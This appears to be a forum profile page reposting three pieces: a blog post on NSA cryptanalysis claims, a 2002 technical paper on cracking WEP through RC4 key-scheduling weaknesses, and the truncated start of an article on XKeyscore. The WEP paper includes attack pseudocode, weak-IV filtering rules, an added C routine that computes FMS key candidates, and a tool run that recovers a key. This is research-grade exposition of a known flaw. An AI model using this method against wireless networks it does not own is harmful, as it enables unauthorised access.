Everything posted by Nytro
-
NSA's (and GCHQ) Decryption Capabilities: Truth and Lies
by Axelle Apvrille | September 06, 2013

Edward Snowden has revealed new information concerning the cryptographic capabilities of the NSA and GCHQ (The Guardian, ProPublica, leaked documents…). The CryptoGirl was bound to look into that topic. Let's go straight to the point and answer simple questions.

Is cryptography insecure?

No, I don't think so. Basically, cryptography is maths (prime numbers, finite fields, polynomials…), and maths is solid science with proofs and demonstrations. Cryptographic algorithms are only seldom broken (e.g. MD5). What is quite often "broken" are implementations, because implementations are imperfect representations of the maths. Vulnerabilities range from implementation bugs (buffer overflows, etc.) to side-channel attacks (i.e. attacks based on the physical properties of the implementation, such as differential power analysis or timing attacks). Don't believe me? This opinion of mine is backed by Bruce Schneier, who had access to the NSA's documents: "They're doing it primarily by cheating, not by mathematics."

Yes, but they seem to be able to defeat SSL!

Yes. Note that SSL is a security protocol, not a cryptographic algorithm. The documents released by Snowden confirm our fears regarding SSL. As we said in our previous blog post, we believe they do it by getting the private keys of given domains or by performing man-in-the-middle attacks. They could also be using attacks such as BEAST, CRIME or BREACH. SSL is so widely deployed that there is much peer review of the protocol (good), but new vulnerabilities are also exposed each year at security conferences. It seems quite likely that the NSA is aware of those vulnerabilities, perhaps even with a few 0-days.

[Image: Enigma crypto rotor. Image courtesy of LaMenta3 via Flickr.]

Matthew Green says Microsoft CryptoAPI and OpenSSL are probably among the SSL libraries the NSA is the most likely to break into, and I agree with him. In particular, a few years ago I remember that OpenSSL checked certificate chains only up to 9 levels. Certificates for a given entity are issued by a higher authority, and the higher authority's certificate is issued by an even higher authority: that's the chain of trust. So, if you had 10 certificates in your chain, OpenSSL was unable to check the chain, and you could claim to be God and would be trusted. This was a documented issue; I haven't checked whether it has been fixed since (a minimal OpenSSL sketch of enforcing such a depth limit follows the RSA discussion below). By the way, Bruce Schneier recommends the usage of TLS (for those who don't know, TLS is like "SSL 3.1", a newer version of SSL). It is certainly better than SSL in terms of security, but I wouldn't bet on it, as there are (nearly) as many vulnerabilities.

The NSA has supercomputers and excellent cryptographers. They can break the RSA algorithm.

I agree with the first sentence and disagree with the second. Sure, they have powerful computers and cryptographers, but that's not enough to break the RSA algorithm with 2048-bit keys (this key size is used in GPG, for instance). You need huge computational power to brute force RSA 2048. Currently, the RSA Factoring Challenge record stands at RSA-768, and that already represents tremendous work. I don't think the NSA can do much better, and I don't think they have better cryptographers than those of the entire world. People like Shamir, Rivest, Lenstra, Preneel, Coron, Boneh etc. are just exceptional, and I would not think the NSA can influence such a diverse panel of scientists.
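To make the chain-of-trust remark above concrete, here is a minimal, hypothetical sketch (not from the original article) of how a client application can require peer verification and explicitly cap the certificate chain depth with OpenSSL's SSL_CTX_set_verify_depth(); the depth value of 9 simply mirrors the limit mentioned above, and OpenSSL 1.1.0 or later is assumed.

#include <stdio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

int main(void)
{
    /* OpenSSL 1.1.0+ assumed: the library initializes itself automatically. */
    SSL_CTX *ctx = SSL_CTX_new(TLS_client_method());
    if (ctx == NULL) {
        ERR_print_errors_fp(stderr);
        return 1;
    }

    /* Require peer certificate verification... */
    SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);

    /* ...and refuse chains deeper than 9 intermediate certificates,
     * instead of silently accepting whatever the library default allows. */
    SSL_CTX_set_verify_depth(ctx, 9);

    /* Load the default trust store as verification roots. */
    if (SSL_CTX_set_default_verify_paths(ctx) != 1) {
        ERR_print_errors_fp(stderr);
        SSL_CTX_free(ctx);
        return 1;
    }

    printf("context ready: peer verification on, max chain depth 9\n");
    SSL_CTX_free(ctx);
    return 0;
}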
In the specific case of RSA, however, note that improper usage or implementations may be insecure. For instance, signing with RSA 1024 with PKCS#1 and a low exponent is not safe. So, if you use your crypto library (OpenSSL, BouncyCastle etc.) with those settings, too bad. Note that it is not that RSA 1024 is insecure per se, but that particular combination. All cryptographic algorithms are designed to work in a specific, well-defined context. If you use them outside that context, their security may fall apart. As developers say: RTFM.

The slides say they can do it!

No. The information I read in the Guardian's article in no way states that the NSA has the ability to break RSA, nor AES, etc. The slides say that "cryptanalytic capabilities are now coming on line" or that they have "groundbreaking capabilities", which is far too vague. True, I haven't had access to the full set of slides, so I might be missing something important. Still, I would not trust those slides fully. Why? Because they don't sound like technical slides from a cryptographer. Would a cryptographer write that he has "groundbreaking capabilities"? No. That's not the way cryptographers talk. They would rather say "breakable in O(2^n)" or something like that. To me, the slides emanate from some high-level manager. I guess all of us have already seen slides about products which do not really correspond to reality, huh?

The NSA influences standards and puts backdoors in applications

Yes, I believe this is possible. Matthew Green summarized it very well: "Cryptographers have always had complicated feelings about NIST, and that's mostly because NIST has a complicated relationship with the NSA." I wonder, however, exactly which 2006 standard the Guardian refers to. My guess would be that the same applies to (some) RFCs and IEEE standards such as P1363. Elliptic curve choices are indeed somewhat obscure and could typically have been influenced by the NSA. This is also in line with Bruce Schneier's recommendation: "Prefer conventional discrete-log-based systems over elliptic-curve systems; the latter have constants that the NSA influences when they can."

As for putting backdoors into programs, to some extent, I can personally guarantee this is true - and not only in the US! Some 15 years ago (wow…), I was a junior developer working on a quite well-known encryption product. To comply with French law and be able to commercialize the product, we had absolutely no choice but to embed a backdoor for the French government. That backdoor enabled them to decrypt the session key and hence any document encrypted with the tool. I remember the product featured a label like "Approved by SCSSI" (France's former information security agency) which, in practice, meant it held the backdoor. In France, the laws around cryptography are now less restrictive, but this is just to say that I would not be surprised if the US asked for key escrow.

What tools can I use?

Bruce Schneier provides several recommendations. See also this document. It is also worth having a look at PRISM Break. I complement them with a table below of what I think - personal opinion - is secure or not. Unfortunately, "green" does not mean it is guaranteed to be secure. For instance, the implementation may be flawed. But it's better than orange…

– the Crypto Girl

Source: Fortinet Blog | News and Threat Research - NSA's (and GCHQ) Decryption Capabilities: Truth and Lies
+ https://www.schneier.com/blog/archives/2013/09/conspiracy_theo_1.html
-
Practical Exploitation of RC4 Weaknesses in WEP Environments
February 22, 2002 by David Hulton <h1kari@dachb0den.com> - (c) Dachb0den Labs 2002
[http://www.dachb0den.com/projects/bsd-airtools.html]

1. Introduction

This document will give a brief background on 802.11b-based WEP weaknesses, outline a few additional flaws in rc4 that stem from the concepts outlined in "Weaknesses in the Key Scheduling Algorithm of RC4" (FMS) and "Using the Fluhrer, Mantin, and Shamir Attack to Break WEP" (SIR), and describe specific methods that will allow you to optimize key recovery. This document is provided as a conceptual supplement to dweputils, a wep auditing toolset, which is part of the bsd-airtools package provided by Dachb0den Labs. The basic goal of the article is to provide technical details on how to effectively implement the FMS attack so that it works efficiently with both a small amount of iv collection time as well as cracking and processing time, and to provide details on how other pseudo random generation algorithm (prga) output bytes reveal key information.

2. Background

WEP is based on RSA's rc4 stream cipher and uses a 24-bit initialization vector (iv), which is concatenated with a 40-bit or 104-bit secret shared key to create a 64-bit or 128-bit key which is used as the rc4 seed. Most cards generate the 24-bit iv either with a counter or with some sort of pseudo random number generator (prng). The payload is then encrypted along with an appended 32-bit checksum and sent out with the iv in plaintext, as illustrated:

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                                                               |
     |                         802.11 Header                         |
     |                                                               |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     IV[0]     |     IV[1]     |     IV[2]     |    Key ID     |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | . . . . . . SNAP[0] . . . . . | . . . . . SNAP[1] . . . . . . |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | . . . . . . SNAP[2] . . . . . | . . . . Protocol ID . . . . . |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
     | . . . . . . . . . . . . . Payload . . . . . . . . . . . . . . |
     | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | . . . . . . . . . . . 32-bit Checksum . . . . . . . . . . . . |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

      . - denotes encrypted portion of packet

After the data is sent out, the receiver simply concatenates the received iv with their secret key to decrypt the payload. If the checksum checks out, then the packet is valid.

2.1. Current Cracking Methods

Essentially, most of the wep attacks out there these days are either based on brute forcing methods - often including optimizations based on how the key is generated, or using a wordlist - or on statistical analysis of initialization vectors (ivs) and their first rc4 output byte, to set up conditions in the rc4 key scheduling algorithm (ksa) that reveal information about particular bytes in the secret key.

2.1.1. Brute Forcing

Brute forcing has been proven to be an effective method of breaking wep, mainly thanks to all of the work done by Tim Newsham.
This method basically consists of trying to decrypt the encrypted payload of a captured 802.11b packet using a set of keys and verifying validity by seeing if the 32-bit checksum checks out. In most cases, if the key checks out, it is important to check it against another packet to make sure the key is actually valid, since many times the packet can be decrypted with an invalid key and the checksum will still be valid. This mode of attack generally only requires 2 packets.

Tim Newsham's most effective cracking method stems from the weaknesses in the password-based key generation algorithm used by most 40-bit cards and access points. By taking advantage of this weakness, it reduces the 40-bit keyspace down to 21 bits, which is trivial to crack (20-40 seconds on most current-day machines). Also, wordlist attacks prove almost equally effective on both 40-bit and 104-bit 802.11b networks, provided you have a decent list of commonly used passphrases. Even without using these optimizations, you can still exhaust the entire 40-bit keyspace in roughly 45 days on a decent machine, or in a very reasonable amount of time using a distributed network of machines. Although this mode of attack can be applied to many networks out there, it fails against a properly secured 104-bit network, since the amount of time required to brute force a 104-bit key is generally longer than an attacker's great-grandchildren would want to wait.

2.1.2. FMS Attack

Up until now, all open source wep cracking utilities that use the FMS attack have used an extremely limited mode of operation as described in FMS in Section 7.1 "IV Precedes the Secret Key" (also published by Wagner in Wag95), which involves only looking for ivs that match:

  (A + 3, N - 1, X)

This is a particular condition that works almost all of the time and is not dependent on the preceding keys. However, as described later on in FMS in Section A "Applying The Attack to WEP-like Cryptosystems", they recommend that you use the following equation on the S permutation immediately after the KSA to determine if an iv is weak:

  X = S{B + 3}[1] < B + 3
  X + S{B + 3}[X] = B + 3

This equation uncovers many more ivs than the 256 per key that most implementations currently use. This was made obvious in SIR in Section 4.1 "Choosing IVs", but it wasn't thoroughly expanded on how to effectively use a pool of logged ivs to successfully perform this attack in a reasonable amount of time. The main dilemmas with applying this equation to all of the ivs that you collect are that you have to check all of your logged ivs at least once for every key byte that you try, and that it takes a considerable amount of resources to apply this algorithm to a set of 2,000,000 ivs. So, not only do you have to do a large amount of processing, but you have to do it for an extremely large set of possibilities.

Also, all of the current implementations only attack the 1st rc4 output byte, mainly because it is the one that provides the most accurate information about the key bytes. However, attacking the other bytes can also provide clues, although minute, to the static key that was used. This can sometimes provide enough statistical data to derive key bytes in cases when you aren't able to collect a large amount of captured data and have more time to spend processing.

3. Additional Flaws in the KSA

The main flaw in rc4 that hasn't been thoroughly expanded on is using information provided by other bytes in the prga output stream.
This attack is similar to the FMS attack, but requires additional processing because you also have to emulate portions of the pseudo random generation algorithm (prga) to determine if an iv gives out key information in byte A. However, the bytes that you can attack using this method directly depend on the bytes of the key you have already recovered, and they are extremely hard to predict without excessive processing. To demonstrate this, I will first provide background on the current common mode of attack, which attacks the first output byte, and then show how it can be expanded to other bytes.

3.1. Attacking the First Byte

The first byte attack works based on the fact that you can simulate part of the ksa using the known iv and derive the values of elements in the S permutation that will only change 1 - (e ** -X) of the time, where X is the number of S elements that your attack depends on. This can be illustrated as follows when attacking the first byte in the secret key (SK):

Definitions:

 KSA(K)
  Initialization:
   For i = 0 ... N - 1
    S[i] = i
   j = 0
  Scrambling:
   For i = 0 ... N - 1
    j = j + S[i] + K[i mod l]
    Swap(S[i], S[j])

 PRGA(K)
  Initialization:
   i = 0
   j = 0
  Generation Loop:
   i = i + 1
   j = j + S[i]
   Swap(S[i], S[j])
   Output z = S[S[i] + S[j]]

 - For demonstration purposes N = 16, although it is normally 256.
 - Also, all addition and subtraction operations are carried out modulo N, and negative
   results have N added to them so results are always 0 <= x < N.

Simulation:

 let B = 0 - byte in K that we are attacking
 let IV = B + 3, f, 8
 let SK = 1, 2, 3, 4, 5
 let K = IV . SK
 let l = the amount of elements in K
 assume that no S elements get swapped when i > B + 3

KSA - K = 3, f, 8, 1, 2, 3, 4, 5

 Known Portion:
     0 1 2 3 4 5 6 7 8 9 a b c d e f     j  S[i]  K
     3     0                             i = 0, j = 0 + 0 + 3 = 3
       0   1                             i = 1, j = 3 + 1 + f = 3
         d                     2         i = 2, j = 3 + 2 + 8 = d
 Unknown Portion:
           f                       1     i = 3, j = d + 1 + 1 = f

 - Note that S[B + 3] always contains information relating to SK[B], since SK[B] is used
   to calculate j.

PRGA - S = 3, 0, d, f, 4, 5, 6, 7, 8, 9, a, b, c, 2, e, 1

 Unknown Portion:
     0 1 2 3 4 5 6 7 8 9 a b c d e f     j  S[i]  S[i] + S[j]
     3 0 d f 4 5 6 7 8 9 a b c 2 e 1     Unknown KSA Output
     0 3                                 i = 1, j = 0 + 0 = 0, z = S[0 + 3] = f

In this instance, f will be output as the first PRGA byte, which is in turn xor'ed with the first byte of the snap header. The first byte of the snap header is almost always 0xaa, so we can easily derive the original f by simply xor'ing the first byte in our encrypted payload with 0xaa. To reverse the f back into the first byte of the SK that was used to generate it, we just iterate through the KSA up to the point where we know the j and S[i] values that were used to derive the f, as provided in the previous demonstration. Once the j and S[i] values are derived, we can easily reverse them to SK[B] as illustrated:

Definitions:
 let S{-1}[Out] be the location of Out in the S permutation
 let Out be z in the first iteration of the PRGA
 assume values in the Known Portion of the KSA from where i = 2

 SK[B] = S{-1}[Out] - j - S[i + 1]

Application:
 SK[B] = S{-1}[f] - j - S[3] = f - d - 1 = 1

This method provides us with the correct key roughly e ** -3 =~ 5% of the time, and sometimes e ** -2 =~ 13% of the time in cases when we only rely on 2 elements in the S permutation staying the same. As you can see in the ksa and prga simulation above, we only rely on elements 0, 1, and 3 not changing for the output byte to be reliable, so the probability of our output byte being f is 5%.
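The KSA/PRGA definitions above translate directly into code. Below is a small, self-contained C sketch of my own (not part of the original paper) that, for a candidate weak iv, runs only the known first B + 3 KSA steps for N = 256, checks the resolved condition from section 2.1.2, and then inverts the first keystream byte into an SK[B] candidate exactly as in the SK[B] = S{-1}[Out] - j - S[B + 3] derivation above; the value z would come from XORing the first encrypted payload byte with the SNAP constant 0xaa, and candidates from many weak ivs are tallied, the most frequent one winning.

#include <stdint.h>
#include <string.h>

#define N 256

static void swap_u8(uint8_t *a, uint8_t *b) { uint8_t t = *a; *a = *b; *b = t; }

/* KSA exactly as defined above: S[i] = i, then j = j + S[i] + K[i mod l]. */
static void ksa(const uint8_t *key, int keylen, uint8_t S[N])
{
    int i, j = 0;
    for (i = 0; i < N; i++)
        S[i] = (uint8_t)i;
    for (i = 0; i < N; i++) {
        j = (j + S[i] + key[i % keylen]) & 0xff;
        swap_u8(&S[i], &S[j]);
    }
}

/* First PRGA output byte: i = 1, j = S[1], z = S[S[i] + S[j]] after the swap. */
static uint8_t prga_first_byte(uint8_t S[N])
{
    int i = 1, j = S[1];
    swap_u8(&S[i], &S[j]);
    return S[(S[i] + S[j]) & 0xff];
}

/* FMS vote for SK[B], 0 <= B < 13: simulate the known first B + 3 KSA steps
 * using the iv and the already-recovered key bytes, check the resolved
 * condition, and invert the first keystream byte z.  The returned candidate
 * is correct roughly e^-3 (about 5%) of the time. */
static int fms_candidate(const uint8_t iv[3], const uint8_t *sk_known,
                         int B, uint8_t z)
{
    uint8_t key[3 + 13], S[N];
    int i, j = 0, inv;

    memcpy(key, iv, 3);
    memcpy(key + 3, sk_known, (size_t)B);

    for (i = 0; i < N; i++)
        S[i] = (uint8_t)i;
    for (i = 0; i < B + 3; i++) {                 /* known portion only */
        j = (j + S[i] + key[i]) & 0xff;
        swap_u8(&S[i], &S[j]);
    }

    int X = S[1];                                 /* resolved condition */
    if (X >= B + 3 || ((X + S[X]) & 0xff) != B + 3)
        return -1;                                /* iv not usable for this byte */

    for (inv = 0; inv < N && S[inv] != z; inv++)  /* inv = S^-1[z] */
        ;
    if (inv == N)
        return -1;
    return (inv - j - S[B + 3]) & 0xff;           /* SK[B] candidate */
}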
By collecting many different SK[B] candidate values, the correct SK[B] value should become more evident as more data is collected. Additionally, once we determine the most probable value for the first byte in the secret key, we can apply the same algorithm to cracking the next byte in the secret key, and continue until we have cracked the entire secret key. In most implementations this method is combined with brute forcing, so the odds don't have to be perfect in order to recover the key.

3.2. Attacking Additional Output Bytes

This section will demonstrate a set of new unique ivs that provide clues to various bytes in the secret key, in some cases with greater probability than the first bytes. I will first demonstrate what happens when rc4 encounters one of these ivs, and then provide methods for detecting them.

3.2.1. RC4 Encounters a 2nd-Byte Weak IV

In this demonstration, I will use a weak iv that attacks the 2nd byte and show how certain ivs set up the S permutation so that secret key information is revealed in the 2nd byte of output. This method also applies to other output bytes and can be expanded depending on which secret key byte you are attacking. Here is what happens:

Simulation:

 let B = 0 - byte in K that we are attacking
 let IV = 4, c, c
 let SK = 1, 2, 3, 4, 5
 let K = IV . SK
 assume that no S elements get swapped when i > B + 3

KSA - K = 4, c, c, 1, 2, 3, 4, 5

 Known Portion:
     0 1 2 3 4 5 6 7 8 9 a b c d e f     j  S[i]  K
     4       0                           i = 0, j = 0 + 0 + 4 = 4
       1                                 i = 1, j = 4 + 1 + c = 1
         f                         2     i = 2, j = 1 + 2 + c = f
 Unknown Portion:
           3                             i = 3, j = f + 3 + 1 = 3

PRGA - S = 4, 1, f, 3, 0, 5, 6, 7, 8, 9, a, b, c, d, e, 2

 Unknown Portion:
     0 1 2 3 4 5 6 7 8 9 a b c d e f     j  S[i]  S[i] + S[j]
     4 1 f 3 0 5 6 7 8 9 a b c d e 2     Unknown KSA Output
       1                                 i = 1, j = 0 + 1 = 1, z = S[1 + 1] = f
     f   4                               i = 2, j = 1 + f = 0, z = S[f + 4] = 3

Then, since we also often know that the second byte of the snap header is 0xaa, we can determine the 2nd byte of prga output and reverse it back to the original key, as demonstrated:

 SK[B] = S{-1}[3] - f - S[3] = 3 - f - 3 = 1

As you can see, this particular iv will set up the ksa and prga so that the second output byte provides information about the first byte of our key in almost every situation. Additionally, it relies on elements 0, 1, 2, and 3 not changing for the second byte to be accurate, so it will only be correct e ** -4 =~ 2% of the time. Furthermore, in cases where the previous output bytes are derived from dependent elements, we can check whether the actual output byte matches up and determine whether the output we are receiving has been tampered with. If the output matches up, it greatly increases our odds, since we then rely on fewer elements. In this particular case, if the first output byte checked out, it would increase our probability for the 2nd byte to e ** -2 =~ 13%.

3.2.2. Finding Weak IVs for Additional Output Bytes

The main problem with attacking additional output bytes is determining if an iv will reveal part of the secret key in a particular output byte, and also determining if the probabilities are good enough to even consider it. How we can detect if an iv is vulnerable to this sort of attack is similar to the first byte attack, but it requires looping through the prga up until i = (A + 1), where A = the offset in the prga stream of the byte you know the value for.
For each iteration of the prga loop, if there are any instances where j or i >= B + 3, we must discard the iv, since then we are relying on elements in the S permutation that will most likely change. This can be accomplished by modifying the prga algorithm so that it is similar to:

 PRGA(K)
  Initialization:
   For i = 0 ... N - 1
    P[i] = 0
   P[B + 3] = 1
   i = 0
   j = 0
  Generation Loop:
   While i < A + 1
    i = i + 1
    j = j + S[i]
    If i or j >= B + 3 Then Fail
    Swap(S[i], S[j])
    Output z = S[S[i] + S[j]]
    P[i] = 1
    P[j] = 1
  Verification:
   If S[i] + S[j] = B + 3 Then Success
  Probability Analysis:
   j = 0
   For i = 0 ... N - 1
    If P[i] > 0 Then j = j + 1

This algorithm works almost identically to the equation for determining if an iv is vulnerable to the first byte attack, and it can be expanded to detect ivs that reveal keys in any byte of the prga output. You can then weigh the probabilities and determine if it is worth considering. In tests, this method doesn't prove entirely useful, mainly due to the amount of processing that is required to determine whether certain ivs have this property. Since each iv has to be checked for each previous secret key byte that you try, it would probably be most practical to manually derive a table of vulnerable ivs, so that it doesn't require much work during key recovery. In most cases it'd be more practical to collect more ivs and only use the first bytes to perform key recovery; however, in cases when you have a limited set of sample data, it could greatly reduce the time required for recovery.

4. Implementation

This section will focus on practical methods for making use of all of the 1st byte weak ivs without hindering performance. It will also cover optimizations for applying brute forcing and fudging methods to greatly reduce cracking time. The result of the optimizations will allow you to perform key recovery with only 500,000-2,000,000 packets and less than 1 minute of processing time. Although it is mentioned in SIR that they were able to crack wep with a similar number of packets, this mode of attack does not require that the wep key be ascii characters, and it isn't dependent on what key generator the victim used.

4.1. Filtering Weak IVs

The main problem with attacking wep using all of the first byte weak ivs is that the equation specified in FMS has to be applied to each of the ivs for every key that you try, and often you'll have a total of 2,000,000 packets that you've collected and thousands of keys to try before you find the correct one. It has thus far been impractical to use this mode of attack, since it requires a large amount of memory as well as resources. The way I have managed to get around this dilemma is by analyzing the patterns of weak ivs and how they are related to the key bytes they rely on. This is the basic pattern that I've found.
Definitions:
 let x = iv[0]
 let y = iv[1]
 let z = iv[2]
 let a = x + y
 let b = (x + y) - z

Byte 0:
 x = 3 and y = 255
 a = 0 or 1 and b = 2

Byte 1:
 x = 4 and y = 255
 a = 0 or 2 and b = SK[0] + 5

Byte 2:
 x = 5 and y = 255
 a = 0 or 3 and b = SK[0] + SK[1] + 9
 a = 1 and b = 1 or 6 + SK[0] or 5 + SK[0]
 a = 2 and b = 6

Byte 3:
 x = 6 and y = 255
 a = 0 or 4 and b = SK[0] + SK[1] + SK[2] + 14
 a = 1 and b = 0 or SK[0] + SK[1] + 10 or SK[0] + SK[1] + 9
 a = 3 and b = 8

Byte 4:
 x = 7 and y = 255
 a = 0 or 5 and b = SK[0] + SK[1] + SK[2] + SK[3] + 20
 a = 1 and b = 255 or SK[0] + SK[1] + SK[2] + 15 or SK[0] + SK[1] + SK[2] + 14
 a = 2 and b = SK[0] + SK[1] + 11 or SK[0] + SK[1] + 9
 a = 3 and b = SK[0] + 11
 a = 4 and b = 10

This pattern can then be easily expanded into an equation that covers a range independent of what SK values you have. As a result, you have a distribution pattern similar to the one shown below:

                            Secret Key Byte

            0  1  2  3  4  5  6  7  8  9  a  b  c
                  +     +     +     +     +     +
       0    8 16 16 16 16 16 16 16 16 16 16 16 16
       1    8    16 16 16 16 16 16 16 16 16 16 16
       2      16  8    16 16 16 16 16 16 16 16 16
  a    3         16  8 16    16 16 16 16 16 16 16
       4            16  8 16 16    16 16 16 16 16
  V    5               16  8 16 16 16    16 16 16
  a    6                  16  8 16 16 16 16    16
  l    7                     16  8 16 16 16 16 16
  u    8                        16  8 16 16 16 16
  e    9                           16  8 16 16 16
  s    a                              16  8 16 16
       b                                 16  8 16
       c                                    16  8
       d                                       16

   8  - 8-bit set of weak ivs
  16  - 16-bit set of weak ivs
   +  - 2 additional x and y dependent 8-bit weak ivs

From this, we can determine a rough estimate of how many total weak ivs exist for each key byte. It can also be determined using the following equation:

 let ? : be conditional operators
 let MAX(x, y) be x > y ? x : y

 ((B mod 2 ? MAX(B - 2, 0) + 2 : B + 1) * (2 ** 16)) +
 (((B mod 2 ? 0 : 2) + (B > 1 ? 1 : 0) + 1) * (2 ** 8))

However, our real objective is to determine an algorithm that allows us to filter out weak ivs based on the secret key byte that they can attack, so that we can narrow our 2,000,000-element table down to a reasonable size that's easier to search. This can be accomplished by using a simple algorithm similar to:

 let l = the amount of elements in SK

 i = 0
 For B = 0 ... l - 1
  If (((0 <= a and a < B) or
      (a = B and b = (B + 1) * 2)) and
      (B % 2 ? a != (B + 1) / 2 : 1)) or
     (a = B + 1 and (B = 0 ? b = (B + 1) * 2 : 1)) or
     (x = B + 3 and y = N - 1) or
     (B != 0 and !(B % 2) ?
      (x = 1 and y = (B / 2) + 1) or
      (x = (B / 2) + 2 and y = (N - 1) - x) : 0)
  Then ReportWeakIV

This algorithm results in catching the following distribution of ivs:

 Byte   # of IVs   Probability
    0        768   0.00004578
    1     131328   0.00782776
    2     197376   0.01176453
    3     197120   0.01174927
    4     328703   0.01959223
    5     328192   0.01956177
    6     459520   0.02738953
    7     459264   0.02737427
    8     590592   0.03520203
    9     590336   0.03518677
    a     721664   0.04301453
    b     721408   0.04299927
    c     852736   0.05082703

This should differ slightly from the previous weak iv estimation equation, since some ivs in the pattern overlap. By sorting these ivs into tables, you can very easily narrow down the number of ivs to search for each cracking operation to a maximum of 852,736 ivs, or only around 101,654 when supplied with a 2,000,000-packet capture file. This effectively reduces the search time for each key by at least 1/20.

4.2. Fudging

When trying to recover keys using a capture file that doesn't statistically provide enough immediate information to determine the secret key, it is common to perform a brute force based on the most probable key bytes. Up until now the fudge, or breadth, has been implemented as a static number that specifies the range to search for each key byte.
However, with > 2,000,000 samples and a large number of weak ivs for each byte, the probability that the correct key will be the most probable one gets greater as you traverse through each byte. An estimate of the probabilities for this is outlined below:

 Byte   # of IVs   Probability
    0        768   0.00004578
    1        768   0.00004578
    2       2304   0.00013732
    3       1792   0.00010681
    4       3072   0.00018311
    5       2560   0.00015259
    6       4096   0.00024414
    7       3584   0.00021362
    8       5120   0.00030518
    9       4608   0.00027466
    a       6144   0.00036621
    b       5632   0.00033569
    c       6656   0.00039673

Therefore, when attempting to brute force based on a 2,000,000 sample set, your ivs will most likely be near:

 Byte   # of IVs   # of Correct Keys
    0        92           5
    1        92           5
    2       275          14
    3       214          11
    4       366          18
    5       305          15
    6       488          24
    7       427          21
    8       610          30
    9       549          27
    a       732          36
    b       671          33
    c       793          39

Therefore, it is most likely that once you reach byte 2, the key that seems most probable actually is. This means that fudging is most likely not required, or should at least be reduced, the farther you move through the bytes. This reduces the brute forcing time required considerably, since it is now only necessary to fudge the first few bytes of the key; for the rest it is no longer necessary. I have found that in most cases, because of this property of weak ivs, quite a bit fewer than 2,000,000 packets are needed to recover the key, and in some cases you don't even require any statistics for the first couple of bytes of the secret key to perform this attack in a very reasonable amount of time.

5. Results

Using the outlined modifications, I've managed to crack wep using between 500,000 and 2,000,000 packets in under a minute; this is mainly due to the time required for reading in the packets. Here is an example of a successful attack using quite a bit fewer than the 60 required ivs per key byte and only ~500,000 packets:

 h1kari@balthasar ~/bsd-airtools/dweputils/dwepcrack$ ./dwepcrack -w ~/log
 * dwepcrack v0.3a by h1kari <h1kari@dachb0den.com> *
 * Copyright (c) Dachb0den Labs 2002 [http://dachb0den.com] *

 reading in captured ivs, snap headers, and samples... done
 total packets: 500986
 calculating ksa probabilities...
  0: 22/768 keys (!)
  1: 3535/131328 keys (!)
  2: 5459/197376 keys (!)
  3: 5424/197120 keys (!)
  4: 9313/328703 keys (!)

 (!) insufficient ivs, must have > 60 for each key (!)
 (!) probability of success for each key with (!) < 0.5 (!)

 warming up the grinder...
 packet length: 44
 init vector: 58:f7:26
 default tx key: 0
 progress: ....................................

 wep keys successfully cracked!
  0: xx:xx:xx:xx:xx *
 done.

6. Conclusions

The best solution for securing your wireless networks is using traditional wireless security to its fullest, but not relying on it. Manually enter your wep keys and don't use the key generator (or use dwepkeygen ;-Q), change your wep keys frequently, use mac filtering and shared key authentication, and label your wireless network as untrusted (and no, I don't necessarily mean set your ssid to "untrusted"). Wireless networks, just like any other networks, are proportionately insecure to the stupidity of the person managing them.

References

[1] Fluhrer, S., Mantin, I. and Shamir, A. - Weaknesses in the Key Scheduling Algorithm of RC4.
[2] Stubblefield, A., Ioannidis, J. and Rubin, A. - Using the Fluhrer, Mantin, and Shamir Attack to Break WEP.
[3] Newsham, T. - Cracking WEP Keys. Presented at Blackhat 2001.

Source: http://www.dartmouth.edu/~madory/RC4/wepexp.txt
-
XKeyscore: NSA's Surveillance Program
Bhavesh Naik
September 09, 2013

Introduction

The former NSA contractor Edward Snowden became famous for revealing PRISM, a confidential mass surveillance program run by U.S. agencies to eavesdrop on virtually any electronic medium. The whole world realized that Big Brother is real and, yes, he is watching you. It is not fiction any longer.

So what is XKeyscore, exactly? It is a tool that can scour practically anything on the Internet for surveillance purposes. The purpose of XKeyscore is to allow analysts to search the metadata as well as the contents of email and other Internet activity, such as browser history. Analysts can also search by name, telephone number, IP address, keywords, the language in which the Internet activity was conducted, or the type of browser used.

According to the slides published, XKeyscore:

- Is a DNI (digital network intelligence) exploitation system/analytic framework.

- Performs strong (e.g., email) and soft (e.g., content) selection. In an interview in June, Edward Snowden elaborated on his statement about being able to read any individual's email if he had their email address. He said the claim was based in part on the email search capabilities of XKeyscore, which Snowden says he was authorized to use while working as a Booz Allen contractor for the NSA. One of the top-secret documents describes how the program searches within the "bodies of emails, web pages and documents," including the "To, From, CC, BCC lines" and "Contact Us" pages on websites.

- Provides real-time activity. Beyond emails, the XKeyscore system allows analysts to monitor a virtually unlimited array of other Internet activities, including those within social media. The DNI Presenter enables an analyst using this tool to read the content of Facebook chats or private messages.

- Keeps a "rolling buffer" of roughly 3 days of ALL unfiltered data seen by XKeyscore: it stores full-take data at the collection site, indexed by metadata, and provides a series of viewers for common data types.

- Is a federated query system: one query scans all sites. It performs full take, allowing analysts to find targets that were previously unknown by mining metadata.

Revealing: When and Where?

The program's existence was first publicly revealed in July 2013 by Edward Snowden in The Sydney Morning Herald and O Globo newspapers.

What Was Snowden's Statement?

"I, sitting at my desk, (can) wiretap anyone, from you or your accountant, to a federal judge or even the president, if I had a personal email address." - The Guardian (June 10).

Legal vs. Technical Restrictions

